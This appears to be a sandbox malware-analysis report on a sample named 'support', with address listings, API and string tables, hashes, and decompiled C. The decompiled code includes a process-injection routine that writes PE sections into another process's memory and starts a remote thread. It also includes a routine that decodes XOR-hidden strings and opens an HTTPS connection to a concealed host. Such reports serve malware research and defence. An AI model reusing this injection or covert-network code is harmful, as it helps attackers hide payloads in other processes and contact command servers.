0x003bbce0
0x003bbced
0x003bbcfa
0x003bbd07
0x003bbd14
0x003bbd21
0x003bbd2e
0x003bbd3b
0x003bbd43
0x003bbd46
0x003bbd48
0x003bbd50
0x003bbd60
0x003bbd6b
0x003bbd70
0x003bbd71
0x003bbd73
0x003bbd85
0x003bbd88
0x003bbd8d
0x003bbd93
0x003bbd9b
0x003bbda6
0x003bbdad
0x003bbdb5
0x003bbdbc
0x003bbdc1
0x003bbdc3
0x003bbdc8
0x003bbdd2
0x003bbde0
0x003bbded
0x003bbdfa
0x003bbe07
0x003bbe14
0x003bbe21
0x003bbe2e
0x003bbe3b
0x003bbe48
0x003bbe55
0x003bbe62
0x003bbe6f
0x003bbe7c
0x003bbe84
0x003bbe96
0x003bbe9e
0x003bbea1
0x003bbea3
0x003bbea7
0x003bbeb7
0x003bbec2
0x003bbec7
0x003bbec8
0x003bbeca
0x003bbedc
0x003bbedf
0x003bbee4
0x003bbeea
0x003bbef2
0x003bbefd
0x003bbf04
0x003bbf0c
0x003bbf13
0x003bbf18
0x003bbf1e
0x003bbf23
0x003bc043
0x003bc052
0x003bc054
0x003bc059
0x003bc066
0x003bc07a
0x003bc08d
0x003bc0a0
0x003bc0b3
0x003bc0c6
0x003bc0d9
0x003bc0ec
0x003bc0ff
0x003bc112
0x003bc125
0x003bc138
0x003bc14b
0x003bc15e
0x003bc171
0x003bc184
0x003bc197
0x003bc1a2
0x003bc1a8
0x003bc1aa
0x003bc1b1
0x003bc1c7
0x003bc1d5
0x003bc1da
0x003bc1db
0x003bc1dd
0x003bc1f5
0x003bc1f8
0x003bc1fd
0x003bc203
0x003bc20e
0x003bc219
0x003bc220
0x003bc225
0x00000000
0x003bc225
0x003bbf29
0x003bbf2c
0x003bbf32
0x003bbf34
0x003bbf39
0x003bbf43
0x003bbf51
0x003bbf5e
0x003bbf6b
0x003bbf78
0x003bbf85
0x003bbf92
0x003bbf9f
0x003bbfac
0x003bbfb9
0x003bbfc6
0x003bbfce
0x003bbfd1
0x003bbfd3
0x003bbfd6
0x003bbfe6
0x003bbff1
0x003bbff6
0x003bbff7
0x003bbff9
0x003bc00b
0x003bc00e
0x003bc013
0x003bc019
0x003bc021
0x003bc02c
0x003bc033
0x003bc038
0x003bc22b
0x003bc22b
0x003bc232
0x003bc237
0x003bc23d
0x003bc23d
0x003bbf2c
0x003bc242
0x003bc249
0x003bc25d
0x003bc262
0x003bc267
0x003bc267
0x003bc26c
0x003bc28c
0x003bc291
0x003bc296
0x003bc299
0x003bc2a3
0x003bc2bb

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,4B5EE95B,76C86490,73413D00,0000003A), ref: 003BA136
srand.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 003BA13C
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 003BA14F
_localtime64.API-MS-WIN-CRT-TIME-L1-1-0(?), ref: 003BA15E

Part of subcall function 003B4E10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,003B4277), ref: 003B4E55

Part of subcall function 003B9870: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(4B5EE95B), ref: 003B990E

Part of subcall function 003B9940: memset.VCRUNTIME140(00000000,00000000,000000A4), ref: 003B99B2
Part of subcall function 003B9940: CreateEventA.KERNEL32(00000000,00000000,00000000,Wait For Buffer Return), ref: 003B9ACF

Strings

MThd, xrefs: 003BB7B8
MThd, xrefs: 003BB681
n, xrefs: 003BB7C5
e, xrefs: 003BAFDE
MThd, xrefs: 003BC059
O, xrefs: 003BAAA8
[^K/, xrefs: 003BA117
3(&), xrefs: 003BB53B
MThd, xrefs: 003BBDC8
,, xrefs: 003BB0F4
MThd, xrefs: 003BBA07
a --, xrefs: 003BB534
MThd, xrefs: 003BBF39
[, xrefs: 003BC066
&, xrefs: 003BBF43
)b#,, xrefs: 003BA9F1
MThd, xrefs: 003BB5E5
MThd, xrefs: 003BBB6B, 003BBCC8
d, xrefs: 003BB58A
j, xrefs: 003BA790
5, xrefs: 003BB542
~, xrefs: 003BB365
l, xrefs: 003BBDD2

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn_time64$CreateEvent_localtime64memsetsrand
String ID: &$)b#,$,$3(&)$5$MThd$MThd$MThd$MThd$MThd$MThd$MThd$MThd$O$[$[^K/$a --$d$l$n$~$j$e
API String ID: 375025103-1490962105
Opcode ID: 1b6e75c8e46556a6b27d9f68c341fa2a9bc9240986b06572f50b3f068227f255
Instruction ID: cac25d9935a390b70ed5ac9dfefa5f69c424862e69c57227dbb57330cb47b864
Opcode Fuzzy Hash: 1b6e75c8e46556a6b27d9f68c341fa2a9bc9240986b06572f50b3f068227f255
Instruction Fuzzy Hash: 40239C34D0528CDADF16EBE4C852BDDBBB4AF19318F408099E6457B683DB74264CCB29

Uniqueness

Uniqueness Score: -1.00%

Function 003B66C0 Relevance: 44.1, APIs: 18, Strings: 7, Instructions: 356
sleepinjectionCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E003B66C0(void* __ebx, long __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				signed int _v8;
				void _v4104;
				long _v4108;
				char _v4140;
				intOrPtr _v4144;
				void* _v4152;
				intOrPtr _v4156;
				void _v4160;
				intOrPtr _v4200;
				void _v4212;
				void* _v4216;
				intOrPtr _v4220;
				void* _v4224;
				void* _v4228;
				void* _v4232;
				signed int _t71;
				void* _t77;
				intOrPtr _t83;
				long _t92;
				long _t96;
				void* _t108;
				signed int _t116;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t129;
				char _t137;
				intOrPtr* _t139;
				void* _t141;
				char* _t150;
				intOrPtr* _t151;
				char* _t152;
				intOrPtr* _t155;
				void* _t157;
				void* _t158;
				void* _t159;
				intOrPtr _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				void* _t164;
				intOrPtr _t168;
				signed int _t169;
				long _t170;
				intOrPtr _t172;
				long _t174;
				long _t176;
				long _t178;
				void* _t181;
				void* _t182;
				intOrPtr _t183;
				signed int _t185;
				intOrPtr* _t187;
				signed int _t188;
				void* _t189;
				void* _t190;

				E003BF390();
				_t71 =  *0x3c500c; // 0x4b5ee95b
				_v8 = _t71 ^ _t188;
				_t139 = __edx;
				_t178 = __ecx;
				_v4108 = __ecx;
				if( *__edx != 0x5a4d) {
					L18:
					_t33 =  &_v8; // 0x3b7a6b
					return E003BE3D0( *_t33 ^ _t188);
				} else {
					_t168 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					_v4220 = _t168;
					_t77 =  *((intOrPtr*)( *0x6f6378))(__ecx, 0,  *((intOrPtr*)(_t168 + 0x50)), 0x3000, 0x40);
					_v4216 = _t77;
					if(_t77 == 0 ||  *0x6f6364 != 0) {
						goto L18;
					} else {
						memset( &_v4160, 0, 0x34);
						_t190 = _t189 + 0xc;
						_v4160 = LoadLibraryA;
						_v4156 = GetProcAddress;
						_v4152 = _v4216;
						_t83 =  *0x6f6360; // 0x0
						_v4140 = 0;
						_v4144 = _t83;
						if( *0x6f5d2c > 0) {
							_t155 =  >=  ?  *0x6f5d1c : 0x6f5d1c;
							_t164 =  &_v4140 - 0x6f5d1c;
							do {
								_t137 =  *_t155;
								_t15 = _t155 + 1; // 0x0
								_t155 = _t15;
								 *((char*)(_t164 + _t155 - 1)) = _t137;
							} while (_t137 != 0);
						}
						_push(0);
						_push(0x1000);
						_push(_t139);
						_push(_v4216);
						_push(_t178);
						if( *((intOrPtr*)( *0x6f6384))() == 0) {
							goto L18;
						} else {
							_t181 = ( *(_t168 + 0x14) & 0x0000ffff) + _t168;
							_t169 = 0;
							if( *(_v4220 + 6) == 0) {
								L12:
								_t141 = _v4108;
								_t182 =  *((intOrPtr*)( *0x6f6378))(_t141, 0, 0x34, 0x3000, 4);
								_v4224 = _t182;
								if(_t182 == 0) {
									goto L18;
								} else {
									_push(0);
									_push(0x34);
									_push( &_v4160);
									_push(_t182);
									_push(_t141);
									if( *((intOrPtr*)( *0x6f6384))() == 0) {
										goto L18;
									} else {
										_t92 =  *((intOrPtr*)( *0x6f6378))(_t141, 0, 0x1000, 0x3000, 0x40);
										_t170 = _t92;
										_v4232 = _t170;
										if(_t170 != 0) {
											_push(0);
											_push(0x1000);
											_push(E003B7AB0);
											_push(_t170);
											_push(_t141);
											if( *((intOrPtr*)( *0x6f6384))() == 0) {
												goto L18;
											} else {
												_t96 =  *((intOrPtr*)( *0x6f637c))(_t141, 0, 0, _t170, _t182, 0, 0);
												if(_t96 != 0) {
													CloseHandle(_t96);
													asm("o16 nop [eax+eax]");
													while(1) {
														_v4108 = 0;
														GetExitCodeProcess(_t141,  &_v4108);
														if(_v4108 != 0x103) {
															goto L18;
														}
														memset( &_v4212, 0, 0x34);
														_t190 = _t190 + 0xc;
														ReadProcessMemory(_t141, _t182,  &_v4212, 0x34, 0);
														_t183 = _v4200;
														if(_t183 == 0x404040 || _t183 == 0x606060) {
															goto L18;
														} else {
															Sleep(0xa);
															_t182 = _v4224;
															if(_t183 == 0) {
																continue;
															} else {
																memset( &_v4104, 0, 0x1000);
																WriteProcessMemory(_t141, _v4216,  &_v4104, 0x1000, 0);
																_t108 = malloc(0x100000);
																_v4228 = _t108;
																if(_t108 == 0) {
																	goto L18;
																} else {
																	memset(_t108, 0, 0x100000);
																	_t172 = _v4220;
																	_v4108 = 0;
																	_t185 = _t172 + 0x18 + ( *(_t172 + 0x14) & 0x0000ffff);
																	if( *((short*)(_t172 + 6)) != 0) {
																		do {
																			_t174 =  *(_t185 + 0x10);
																			if(_t174 != 0) {
																				_t150 = ".pdata";
																				_t116 = _t185;
																				while(1) {
																					_t157 =  *_t116;
																					if(_t157 !=  *_t150) {
																						break;
																					}
																					if(_t157 == 0) {
																						L37:
																						_t117 = 0;
																					} else {
																						_t162 =  *((intOrPtr*)(_t116 + 1));
																						if(_t162 != _t150[1]) {
																							break;
																						} else {
																							_t116 = _t116 + 2;
																							_t150 =  &(_t150[2]);
																							if(_t162 != 0) {
																								continue;
																							} else {
																								goto L37;
																							}
																						}
																					}
																					L39:
																					if(_t117 == 0) {
																						L56:
																						WriteProcessMemory(_t141,  *((intOrPtr*)(_t185 + 0xc)) + _v4216, _v4228, _t174, 0);
																					} else {
																						_t151 = ".rsrc";
																						_t121 = _t185;
																						while(1) {
																							_t158 =  *_t121;
																							if(_t158 !=  *_t151) {
																								break;
																							}
																							if(_t158 == 0) {
																								L45:
																								_t122 = 0;
																							} else {
																								_t161 =  *((intOrPtr*)(_t121 + 1));
																								if(_t161 !=  *((intOrPtr*)(_t151 + 1))) {
																									break;
																								} else {
																									_t121 = _t121 + 2;
																									_t151 = _t151 + 2;
																									if(_t161 != 0) {
																										continue;
																									} else {
																										goto L45;
																									}
																								}
																							}
																							L47:
																							if(_t122 == 0) {
																								goto L56;
																							} else {
																								_t152 = ".reloc";
																								_t123 = _t185;
																								while(1) {
																									_t159 =  *_t123;
																									if(_t159 !=  *_t152) {
																										break;
																									}
																									if(_t159 == 0) {
																										L53:
																										_t124 = 0;
																									} else {
																										_t160 =  *((intOrPtr*)(_t123 + 1));
																										if(_t160 != _t152[1]) {
																											break;
																										} else {
																											_t123 = _t123 + 2;
																											_t152 =  &(_t152[2]);
																											if(_t160 != 0) {
																												continue;
																											} else {
																												goto L53;
																											}
																										}
																									}
																									L55:
																									if(_t124 == 0) {
																										goto L56;
																									}
																									goto L57;
																								}
																								asm("sbb eax, eax");
																								_t124 = _t123 | 0x00000001;
																								goto L55;
																							}
																							goto L57;
																						}
																						asm("sbb eax, eax");
																						_t122 = _t121 | 0x00000001;
																						goto L47;
																					}
																					goto L57;
																				}
																				asm("sbb eax, eax");
																				_t117 = _t116 | 0x00000001;
																				goto L39;
																			}
																			L57:
																			_t185 = _t185 + 0x28;
																			_t176 = _v4108 + 1;
																			_v4108 = _t176;
																		} while (_t176 != ( *(_v4220 + 6) & 0x0000ffff));
																	}
																	VirtualFreeEx(_t141, _v4232, 0, 0x8000);
																	VirtualFreeEx(_t141, _v4224, 0, 0x8000);
																	Sleep(0x1f4);
																	_t69 =  &_v8; // 0x3b7a6b
																	return E003BE3D0( *_t69 ^ _t188);
																}
															}
														}
														goto L59;
													}
													goto L18;
												} else {
													VirtualFreeEx(_t141, _v4216, _t96, 0x8000);
													VirtualFreeEx(_t141, _t182, 0, 0x8000);
													_push(0x8000);
													_push(0);
													_push(_t170);
													goto L16;
												}
											}
										} else {
											VirtualFreeEx(_t141, _v4216, _t92, 0x8000);
											_push(0x8000);
											_push(_t170);
											_push(_t182);
											L16:
											_push(_t141);
											goto L17;
										}
									}
								}
							} else {
								_t187 = _t181 + 0x2c;
								do {
									_t129 =  *((intOrPtr*)(_t187 - 4));
									if(_t129 == 0) {
										goto L11;
									} else {
										_push(0);
										_push(_t129);
										_push( *_t187 + _t139);
										_push( *((intOrPtr*)(_t187 - 8)) + _v4216);
										_push(_v4108);
										if( *((intOrPtr*)( *0x6f6384))() == 0) {
											_push(0x8000);
											_push(0);
											_push(_v4216);
											_push(_v4108);
											L17:
											VirtualFreeEx();
											goto L18;
										} else {
											goto L11;
										}
									}
									goto L59;
									L11:
									_t169 = _t169 + 1;
									_t187 = _t187 + 0x28;
								} while (_t169 != ( *(_v4220 + 6) & 0x0000ffff));
								goto L12;
							}
						}
					}
				}
				L59:
			}

0x003b66c8
0x003b66cd
0x003b66d4
0x003b66d8
0x003b66e0
0x003b66e3
0x003b66ec
0x003b68a2
0x003b68a7
0x003b68b4
0x003b66f2
0x003b66fa
0x003b6703
0x003b670f
0x003b6711
0x003b6719
0x00000000
0x003b672c
0x003b6737
0x003b6741
0x003b674b
0x003b6756
0x003b6762
0x003b6768
0x003b676d
0x003b6774
0x003b677a
0x003b678e
0x003b6795
0x003b6797
0x003b6797
0x003b6799
0x003b6799
0x003b679c
0x003b67a0
0x003b6797
0x003b67a9
0x003b67ab
0x003b67b0
0x003b67b1
0x003b67b7
0x003b67bc
0x00000000
0x003b67c2
0x003b67cc
0x003b67ce
0x003b67d4
0x003b6821
0x003b6821
0x003b683a
0x003b683c
0x003b6844
0x00000000
0x003b6846
0x003b6852
0x003b6854
0x003b6856
0x003b6857
0x003b6858
0x003b685d
0x00000000
0x003b685f
0x003b6873
0x003b6875
0x003b6877
0x003b687f
0x003b68cf
0x003b68d1
0x003b68d6
0x003b68db
0x003b68dc
0x003b68e1
0x00000000
0x003b68e3
0x003b68f3
0x003b68f7
0x003b6929
0x003b6935
0x003b6940
0x003b6946
0x003b6952
0x003b695e
0x00000000
0x00000000
0x003b696f
0x003b6974
0x003b6984
0x003b698a
0x003b6996
0x00000000
0x003b69a8
0x003b69aa
0x003b69b2
0x003b69b8
0x00000000
0x003b69ba
0x003b69c8
0x003b69e5
0x003b69f0
0x003b69f9
0x003b6a01
0x00000000
0x003b6a07
0x003b6a0f
0x003b6a14
0x003b6a1d
0x003b6a2e
0x003b6a35
0x003b6a40
0x003b6a40
0x003b6a45
0x003b6a4b
0x003b6a50
0x003b6a52
0x003b6a52
0x003b6a56
0x00000000
0x00000000
0x003b6a5a
0x003b6a6e
0x003b6a6e
0x003b6a5c
0x003b6a5c
0x003b6a62
0x00000000
0x003b6a64
0x003b6a64
0x003b6a67
0x003b6a6c
0x00000000
0x00000000
0x00000000
0x00000000
0x003b6a6c
0x003b6a62
0x003b6a77
0x003b6a79
0x003b6adb
0x003b6aef
0x003b6a7b
0x003b6a7b
0x003b6a80
0x003b6a82
0x003b6a82
0x003b6a86
0x00000000
0x00000000
0x003b6a8a
0x003b6a9e
0x003b6a9e
0x003b6a8c
0x003b6a8c
0x003b6a92
0x00000000
0x003b6a94
0x003b6a94
0x003b6a97
0x003b6a9c
0x00000000
0x00000000
0x00000000
0x00000000
0x003b6a9c
0x003b6a92
0x003b6aa7
0x003b6aa9
0x00000000
0x003b6aab
0x003b6aab
0x003b6ab0
0x003b6ab2
0x003b6ab2
0x003b6ab6
0x00000000
0x00000000
0x003b6aba
0x003b6ace
0x003b6ace
0x003b6abc
0x003b6abc
0x003b6ac2
0x00000000
0x003b6ac4
0x003b6ac4
0x003b6ac7
0x003b6acc
0x00000000
0x00000000
0x00000000
0x00000000
0x003b6acc
0x003b6ac2
0x003b6ad7
0x003b6ad9
0x00000000
0x00000000
0x00000000
0x003b6ad9
0x003b6ad2
0x003b6ad4
0x00000000
0x003b6ad4
0x00000000
0x003b6aa9
0x003b6aa2
0x003b6aa4
0x00000000
0x003b6aa4
0x00000000
0x003b6a79
0x003b6a72
0x003b6a74
0x00000000
0x003b6a74
0x003b6af5
0x003b6afb
0x003b6b04
0x003b6b05
0x003b6b0f
0x003b6a40
0x003b6b25
0x003b6b39
0x003b6b44
0x003b6b4a
0x003b6b5c
0x003b6b5c
0x003b6a01
0x003b69b8
0x00000000
0x003b6996
0x00000000
0x003b68f9
0x003b6906
0x003b6915
0x003b691b
0x003b6920
0x003b6922
0x00000000
0x003b6922
0x003b68f7
0x003b6881
0x003b688e
0x003b6894
0x003b6899
0x003b689a
0x003b689b
0x003b689b
0x00000000
0x003b689b
0x003b687f
0x003b685d
0x003b67d6
0x003b67d6
0x003b67e0
0x003b67e0
0x003b67e5
0x00000000
0x003b67e7
0x003b67ed
0x003b67ef
0x003b67f4
0x003b67fe
0x003b67ff
0x003b6809
0x003b68b5
0x003b68ba
0x003b68bc
0x003b68c2
0x003b689c
0x003b689c
0x00000000
0x00000000
0x00000000
0x00000000
0x003b6809
0x00000000
0x003b680f
0x003b6815
0x003b6816
0x003b681d
0x00000000
0x003b67e0
0x003b67d4
0x003b67bc
0x003b6719
0x00000000

APIs

memset.VCRUNTIME140(?,00000000,00000034,?,00000000,?,00003000,00000040,76C86490,00000000,?,?,003B7A6B), ref: 003B6737
VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?,?,00001000,00000000), ref: 003B688E
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000,?,?,?,00001000,00000000), ref: 003B689C
VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?,?,00001000,00000000), ref: 003B6906
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000,?,?,?,00001000,00000000), ref: 003B6915
CloseHandle.KERNEL32(00000000,?,?,?,00001000,00000000), ref: 003B6929
GetExitCodeProcess.KERNEL32 ref: 003B6952
memset.VCRUNTIME140(?,00000000,00000034,?,?,?,00001000,00000000), ref: 003B696F
ReadProcessMemory.KERNEL32(?,00000000,?,00000034,00000000,?,?,?,?,?,003B7A6B), ref: 003B6984
Sleep.KERNEL32(0000000A,?,?,?,?,?,003B7A6B), ref: 003B69AA
memset.VCRUNTIME140(?,00000000,00001000,?,?,?,?,?,003B7A6B), ref: 003B69C8
WriteProcessMemory.KERNEL32(?,?,?,00001000,00000000,?,?,?,?,?,?,?,?,003B7A6B), ref: 003B69E5
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00100000,?,?,?,?,?,?,?,?,003B7A6B), ref: 003B69F0
memset.VCRUNTIME140(00000000,00000000,00100000,?,?,?,?,?,?,?,?,?,003B7A6B), ref: 003B6A0F
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 003B6AEF
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 003B6B25
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 003B6B39
Sleep.KERNEL32(000001F4), ref: 003B6B44

Strings

kz;, xrefs: 003B68A7, 003B6B4A
.rsrc, xrefs: 003B6A7B
@@@, xrefs: 003B6990
[^K/, xrefs: 003B66CD
.pdata, xrefs: 003B6A4B
.reloc, xrefs: 003B6AAB
```, xrefs: 003B699C

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: FreeVirtual$Processmemset$Memory$SleepWrite$CloseCodeExitHandleReadmalloc
String ID: .pdata$.reloc$.rsrc$@@@$[^K/$```$kz;
API String ID: 1078695101-3546452639
Opcode ID: d71b4343276b87b10db16f0cdfda7ffc0fd3974eb22df4a52fbfd24d6e54e601
Instruction ID: bdb1235acefe40ee4a71f50b60095322d6a71b7803e5a7d4b5198f711ae8d95d
Opcode Fuzzy Hash: d71b4343276b87b10db16f0cdfda7ffc0fd3974eb22df4a52fbfd24d6e54e601
Instruction Fuzzy Hash: BBC10372A00254ABDB328B24CC86FE577B9BB04708F155095FB89EB282D7B5AD84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 003BCA60 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 235
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E003BCA60(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, char _a4, intOrPtr _a24) {
				char* _v8;
				char _v16;
				signed int _v20;
				void _v1044;
				void _v2068;
				long _v2072;
				char _v2076;
				char _v2077;
				char _v2078;
				char _v2079;
				char _v2080;
				char _v2083;
				short _v2084;
				intOrPtr _v2088;
				char _v2103;
				signed int _v2104;
				void* _v2108;
				char _v2112;
				void* _v2116;
				void* _v2120;
				char _v2124;
				char _v2171;
				signed int _v2172;
				signed int _t66;
				signed int _t67;
				intOrPtr _t77;
				intOrPtr _t88;
				intOrPtr _t89;
				intOrPtr* _t108;
				intOrPtr* _t112;
				void* _t116;
				char _t121;
				void* _t122;
				intOrPtr* _t125;
				long _t126;
				intOrPtr _t128;
				void* _t130;
				intOrPtr _t131;
				void* _t132;
				void* _t135;
				intOrPtr* _t136;
				intOrPtr _t138;
				void* _t141;
				void* _t142;
				int _t143;
				void* _t148;
				void* _t150;
				signed int _t151;
				void* _t152;
				void* _t154;
				void* _t155;

				_push(0xffffffff);
				_push(E003BFE38);
				_push( *[fs:0x0]);
				_t66 =  *0x3c500c; // 0x4b5ee95b
				_t67 = _t66 ^ _t151;
				_v20 = _t67;
				_push(_t67);
				 *[fs:0x0] =  &_v16;
				_t112 = __ecx;
				_v8 = 0;
				memset( &_v1044, 0, 0x400);
				asm("movaps xmm0, [0x3c1b50]");
				_t154 = _t152 - 0x86c + 0xc;
				asm("movups [ebp-0x878], xmm0");
				_t116 = 0;
				_v2072 = 0;
				asm("movaps xmm0, [0x3c1cb0]");
				asm("movups [ebp-0x868], xmm0");
				_v2124 = 0;
				asm("movaps xmm0, [0x3c1b90]");
				asm("movups [ebp-0x858], xmm0");
				asm("o16 nop [eax+eax]");
				do {
					 *(_t151 + _t116 - 0x877) =  *(_t151 + _t116 - 0x877) ^ _v2172;
					_t116 = _t116 + 1;
				} while (_t116 < 0x2f);
				_v2124 = 0;
				memset( &_v2068, 0, 0x400);
				_t155 = _t154 + 0xc;
				_t130 = InternetOpenA(0x3c145d, 0, 0, 0, 0);
				_v2120 = _t130;
				if(_t130 == 0) {
					L22:
					L23:
					_t131 = _a24;
					if(_t131 >= 0x10) {
						_t121 = _a4;
						_t132 = _t131 + 1;
						_t77 = _t121;
						if(_t132 >= 0x1000) {
							_t121 =  *((intOrPtr*)(_t121 - 4));
							_t132 = _t132 + 0x23;
							if(_t77 > 0x1f) {
								__imp___invalid_parameter_noinfo_noreturn();
							}
						}
						_push(_t132);
						E003BE78C(_t77, _t121);
					}
					 *[fs:0x0] = _v16;
					return E003BE3D0(_v20 ^ _t151);
				}
				asm("movaps xmm0, [0x3c1fc0]");
				_t122 = 0;
				asm("movups [ebp-0x834], xmm0");
				_v2088 = 0x7f23797e;
				_v2084 = 0x78;
				asm("o16 nop [eax+eax]");
				do {
					 *(_t151 + _t122 - 0x833) =  *(_t151 + _t122 - 0x833) ^ _v2104;
					_t122 = _t122 + 1;
				} while (_t122 < 0x14);
				_v2083 = 0;
				_t141 = InternetConnectA(_t130,  &_v2103, 0x1bb, 0, 0, 3, 0, 1);
				_v2116 = _t141;
				if(_t141 == 0) {
					goto L22;
				}
				_t147 =  >=  ? _a4 :  &_a4;
				_v2080 = 0x18;
				_v2076 = 0;
				_v2079 = 0x47;
				_v2076 = 0;
				_v2078 = 0x45;
				_v2077 = 0xb;
				_t148 = HttpOpenRequestA(_t141,  &_v2079,  >=  ? _a4 :  &_a4, 0, 0, 0, 0x84800000, 1);
				_v2108 = _t148;
				if(_t148 == 0) {
					goto L22;
				}
				_t125 =  &_v2068;
				_t135 = _t125 + 1;
				do {
					_t88 =  *_t125;
					_t125 = _t125 + 1;
				} while (_t88 != 0);
				_t126 = _t125 - _t135;
				_t136 =  &_v2171;
				_t142 = _t136 + 1;
				do {
					_t89 =  *_t136;
					_t136 = _t136 + 1;
				} while (_t89 != 0);
				_t137 = _t136 - _t142;
				if(HttpSendRequestA(_t148,  &_v2171, _t136 - _t142,  &_v2068, _t126) == 0) {
					goto L22;
				}
				_push(0);
				E003B51D0(_t112, _t137, 0x3c145d);
				if(InternetReadFile(_t148,  &_v1044, 0x3ff,  &_v2072) == 0) {
					L21:
					InternetCloseHandle(_t148);
					InternetCloseHandle(_v2116);
					InternetCloseHandle(_v2120);
					goto L23;
				}
				asm("o16 nop [eax+eax]");
				while(1) {
					_t143 = _v2072;
					if(_t143 == 0) {
						goto L21;
					}
					_t138 =  *((intOrPtr*)(_t112 + 0x14));
					_t128 =  *((intOrPtr*)(_t112 + 0x10));
					if(_t143 > _t138 - _t128) {
						_push(_t143);
						_v2112 = 0;
						E003B5AF0(_t112, _t112, _t143, _t143, _v2112,  &_v1044);
					} else {
						 *((intOrPtr*)(_t112 + 0x10)) = _t143 + _t128;
						_t108 = _t112;
						if(_t138 >= 0x10) {
							_t108 =  *_t112;
						}
						_t150 = _t108 + _t128;
						memmove(_t150,  &_v1044, _t143);
						 *((char*)(_t150 + _t143)) = 0;
						_t155 = _t155 + 0xc;
						_t148 = _v2108;
					}
					if(InternetReadFile(_t148,  &_v1044, 0x3ff,  &_v2072) != 0) {
						continue;
					} else {
						goto L21;
					}
				}
				goto L21;
			}

0x003bca63
0x003bca65
0x003bca70
0x003bca77
0x003bca7c
0x003bca7e
0x003bca84
0x003bca88
0x003bca8e
0x003bca9b
0x003bcaa5
0x003bcaaa
0x003bcab1
0x003bcab4
0x003bcabb
0x003bcabd
0x003bcac7
0x003bcace
0x003bcad5
0x003bcadc
0x003bcae3
0x003bcaea
0x003bcaf0
0x003bcaf6
0x003bcafd
0x003bcafe
0x003bcb0e
0x003bcb18
0x003bcb1d
0x003bcb33
0x003bcb35
0x003bcb3d
0x003bcd43
0x003bcd45
0x003bcd45
0x003bcd4b
0x003bcd4d
0x003bcd50
0x003bcd51
0x003bcd59
0x003bcd5b
0x003bcd5e
0x003bcd69
0x003bcd6b
0x003bcd6b
0x003bcd69
0x003bcd71
0x003bcd73
0x003bcd78
0x003bcd80
0x003bcd98
0x003bcd98
0x003bcb43
0x003bcb4a
0x003bcb4c
0x003bcb53
0x003bcb5d
0x003bcb66
0x003bcb70
0x003bcb76
0x003bcb7d
0x003bcb7e
0x003bcb98
0x003bcba7
0x003bcba9
0x003bcbb1
0x00000000
0x00000000
0x003bcbc0
0x003bcbd1
0x003bcbd9
0x003bcbe4
0x003bcbec
0x003bcbfe
0x003bcc06
0x003bcc12
0x003bcc14
0x003bcc1c
0x00000000
0x00000000
0x003bcc22
0x003bcc28
0x003bcc30
0x003bcc30
0x003bcc32
0x003bcc33
0x003bcc37
0x003bcc39
0x003bcc3f
0x003bcc42
0x003bcc42
0x003bcc44
0x003bcc45
0x003bcc50
0x003bcc64
0x00000000
0x00000000
0x003bcc6a
0x003bcc73
0x003bcc94
0x003bcd26
0x003bcd2d
0x003bcd35
0x003bcd3d
0x00000000
0x003bcd3f
0x003bcc9a
0x003bcca0
0x003bcca0
0x003bcca8
0x00000000
0x00000000
0x003bccaa
0x003bccaf
0x003bccb6
0x003bcce7
0x003bccee
0x003bccff
